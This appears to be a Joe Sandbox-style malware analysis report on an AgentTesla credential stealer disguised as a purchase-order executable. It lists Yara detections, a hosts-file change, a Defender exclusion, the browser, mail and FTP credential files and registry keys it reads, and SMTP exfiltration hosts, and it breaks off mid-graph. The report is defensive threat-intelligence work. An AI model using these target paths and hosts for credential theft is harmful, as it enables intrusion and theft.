                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: unknown VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Modifies the hosts file
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3c2afb0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3d94e90.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3f6f990.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3e1f2b0.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3caafb0.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3e9f2b0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3e1f2b0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3c6f990.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3c2afb0.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3caafb0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3e14e90.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3e9f2b0.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.4114e90.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3bef990.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.289167000.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000000.352037043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.372079781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.371351565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.359292860.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.393985190.0000000003BEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.510450291.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.510451079.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.510429258.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.373291571.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.283648504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.372700308.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000000.351287356.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.283045537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.395811711.0000000003D12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.282465833.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.358279749.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000000.350592858.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000000.349995219.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.289411327.0000000004092000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.281949577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Purchase order 450080088 proj. Allt Charnan.exe PID: 6588, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Purchase order 450080088 proj. Allt Charnan.exe PID: 7124, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 7076, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 7100, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 6676, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 5908, type: MEMORYSTR
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: Yara matchFile source: 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Purchase order 450080088 proj. Allt Charnan.exe PID: 7124, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 6676, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 5908, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3c2afb0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3d94e90.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3f6f990.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3e1f2b0.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3caafb0.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3e9f2b0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3e1f2b0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3c6f990.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3c2afb0.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3caafb0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3e14e90.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3e9f2b0.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.4114e90.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3bef990.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.289167000.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000000.352037043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.372079781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.371351565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.359292860.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.393985190.0000000003BEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.510450291.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.510451079.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.510429258.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.373291571.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.283648504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.372700308.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000000.351287356.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.283045537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.395811711.0000000003D12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.282465833.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.358279749.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000000.350592858.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000000.349995219.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.289411327.0000000004092000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.281949577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Purchase order 450080088 proj. Allt Charnan.exe PID: 6588, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Purchase order 450080088 proj. Allt Charnan.exe PID: 7124, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 7076, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 7100, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 6676, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 5908, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts211
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		11
                    Process Injection                    		1
                    File and Directory Permissions Modification                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		Exfiltration Over Other Network Medium1
                    Encrypted Channel                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Native API                    		1
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		11
                    Disable or Modify Tools                    		1
                    Credentials in Registry                    		114
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		Exfiltration Over Bluetooth1
                    Non-Standard Port                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts1
                    Scheduled Task/Job                    		Logon Script (Windows)1
                    Registry Run Keys / Startup Folder                    		11
                    Deobfuscate/Decode Files or Information                    		Security Account Manager1
                    Query Registry                    		SMB/Windows Admin Shares1
                    Email Collection                    		Automated Exfiltration1
                    Non-Application Layer Protocol                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
                    Obfuscated Files or Information                    		NTDS311
                    Security Software Discovery                    		Distributed Component Object ModelInput CaptureScheduled Transfer11
                    Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script13
                    Software Packing                    		LSA Secrets1
                    Process Discovery                    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Masquerading                    		Cached Domain Credentials131
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items131
                    Virtualization/Sandbox Evasion                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
                    Process Injection                    		Proc Filesystem1
                    Remote System Discovery                    		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                    Hidden Files and Directories                    		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 626538 Sample: Purchase order 450080088 pr... Startdate: 14/05/2022 Architecture: WINDOWS Score: 100 67 us2.smtp.mailhostbox.com 2->67 69 smtp.transmase.com 2->69 83 Found malware configuration 2->83 85 Malicious sample detected (through community Yara rule) 2->85 87 Multi AV Scanner detection for dropped file 2->87 89 14 other signatures 2->89 8 Purchase order 450080088 proj. Allt Charnan.exe 7 2->8         started        12 jVULYR.exe 2->12         started        14 jVULYR.exe 2->14         started        signatures3 process4 file5 49 C:\Users\user\AppData\Roaming49pPgfycY.exe, PE32 8->49 dropped 51 C:\Users\...51pPgfycY.exe:Zone.Identifier, ASCII 8->51 dropped 53 C:\Users\user\AppData\Local\...\tmp86F3.tmp, XML 8->53 dropped 55 Purchase order 450...llt Charnan.exe.log, ASCII 8->55 dropped 91 Adds a directory exclusion to Windows Defender 8->91 16 Purchase order 450080088 proj. Allt Charnan.exe 2 9 8->16         started        21 powershell.exe 25 8->21         started        23 schtasks.exe 1 8->23         started        25 Purchase order 450080088 proj. Allt Charnan.exe 8->25         started        93 Multi AV Scanner detection for dropped file 12->93 95 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->95 97 Machine Learning detection for dropped file 12->97 99 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 12->99 27 jVULYR.exe 12->27         started        29 schtasks.exe 12->29         started        31 jVULYR.exe 14->31         started        33 schtasks.exe 14->33         started        signatures6 process7 dnsIp8 57 